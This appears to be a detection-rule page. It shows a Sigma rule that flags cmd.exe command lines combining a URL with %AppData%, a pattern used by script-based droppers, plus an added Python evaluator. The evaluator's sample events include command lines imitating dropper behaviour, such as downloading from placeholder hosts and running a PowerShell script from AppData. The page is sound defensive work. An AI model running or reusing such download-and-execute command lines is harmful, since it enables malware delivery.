Command Line Execution with Suspicious URL and AppData Strings

Detects a suspicious command line execution whose parameters contain both a URL and an AppData string, a combination used by several droppers (js/vbs > powershell).

Sigma rule

title: Command Line Execution with Suspicious URL and AppData Strings
id: 1ac8666b-046f-4201-8aba-1951aaec03a3
status: test
description: Detects a suspicious command line execution that includes an URL and AppData string in the command line parameters as used by several droppers (js/vbs > powershell)
references:
    - https://www.hybrid-analysis.com/sample/3a1f01206684410dbe8f1900bbeaaa543adfcd07368ba646b499fa5274b9edf6?environmentId=100
    - https://www.hybrid-analysis.com/sample/f16c729aad5c74f19784a24257236a8bbe27f7cdc4a89806031ec7f1bebbd475?environmentId=100
author: Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community
date: 2019/01/16
modified: 2021/11/27
tags:
    - attack.execution
    - attack.command_and_control
    - attack.t1059.003
    - attack.t1059.001
    - attack.t1105
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        Image|endswith: '\cmd.exe'
        CommandLine|contains|all:
            - 'http' # captures both http and https
            - '://'
            - '%AppData%'
    condition: selection
fields:
    - CommandLine
    - ParentCommandLine
falsepositives:
    - High
level: medium
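To show what the selection block above actually matches, here is an added Python evaluator that re-implements the rule's logic (Image ends with '\cmd.exe' AND CommandLine contains 'http', '://' and '%AppData%') and runs it over a handful of constructed process-creation events. This is example code written for this page, not part of the Sigma project or its tooling; the sample events, the example.invalid hostnames and the helper names (`matches`, `evaluate`, `SAMPLE_EVENTS`) are all assumptions. Sigma string matching is case-insensitive by default, so the evaluator lower-cases both sides, which is why the event with `%APPDATA%` still matches.

```python
"""Stand-alone evaluator for the rule's 'selection' block (added example, not Sigma's own code)."""

# The selection block of the rule, transcribed as Python data.
SELECTION = {
    "Image|endswith": "\\cmd.exe",
    "CommandLine|contains|all": ["http", "://", "%AppData%"],
}
# The 'fields' the rule asks to surface with each alert.
FIELDS = ["CommandLine", "ParentCommandLine"]


def _apply(field_spec: str, expected, event: dict) -> bool:
    """Evaluate one Sigma field expression ('Field|modifier[|all]') against an event.

    Sigma string comparisons are case-insensitive by default, so both sides are lower-cased.
    """
    field, *modifiers = field_spec.split("|")
    value = str(event.get(field, "")).lower()
    wanted = expected if isinstance(expected, list) else [expected]
    wanted = [str(w).lower() for w in wanted]
    op = modifiers[0] if modifiers else "equals"
    if op == "endswith":
        results = [value.endswith(w) for w in wanted]
    elif op == "contains":
        results = [w in value for w in wanted]
    else:
        results = [value == w for w in wanted]
    # '|all' requires every listed value to hit; otherwise any one value is enough.
    return all(results) if "all" in modifiers else any(results)


def matches(event: dict) -> bool:
    """condition: selection -> every field expression in the selection must hold."""
    return all(_apply(spec, exp, event) for spec, exp in SELECTION.items())


def evaluate(events):
    """Return the rule's 'fields' for every matching event (what an analyst would see)."""
    return [{f: e.get(f, "") for f in FIELDS} for e in events if matches(e)]


# Constructed sample events (not from the page), shaped like Sysmon Event ID 1 fields.
SAMPLE_EVENTS = [
    {   # matches: cmd.exe, URL scheme and %AppData% all present, script-host parent (js dropper pattern)
        "Image": r"C:\Windows\System32\cmd.exe",
        "CommandLine": r"cmd.exe /c powershell.exe -NoProfile -File %AppData%\update.ps1 -Source https://example.invalid/",
        "ParentCommandLine": r'wscript.exe "C:\Users\alice\Downloads\invoice.js"',
    },
    {   # matches too, although benign: this is why the rule lists 'falsepositives: High'
        "Image": r"C:\Windows\System32\cmd.exe",
        "CommandLine": r"cmd.exe /c echo http://intranet.example.invalid/ > %APPDATA%\notes.txt",
        "ParentCommandLine": r"explorer.exe",
    },
    {   # no match: URL and AppData present, but Image is powershell.exe rather than cmd.exe
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": r"powershell.exe -c Invoke-WebRequest https://example.invalid/a -OutFile %AppData%\a",
        "ParentCommandLine": r"cmd.exe",
    },
    {   # no match: cmd.exe with a URL but no %AppData% string
        "Image": r"C:\Windows\System32\cmd.exe",
        "CommandLine": r"cmd.exe /c curl https://example.invalid/health",
        "ParentCommandLine": r"schtasks.exe",
    },
]

if __name__ == "__main__":
    for hit in evaluate(SAMPLE_EVENTS):
        print(hit)
```

The second sample event is the practical caveat: any cmd.exe invocation that merely mentions a URL and the AppData variable trips the rule, so the surfaced ParentCommandLine (a script host such as wscript.exe versus explorer.exe) is what separates the dropper case from routine noise during triage.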
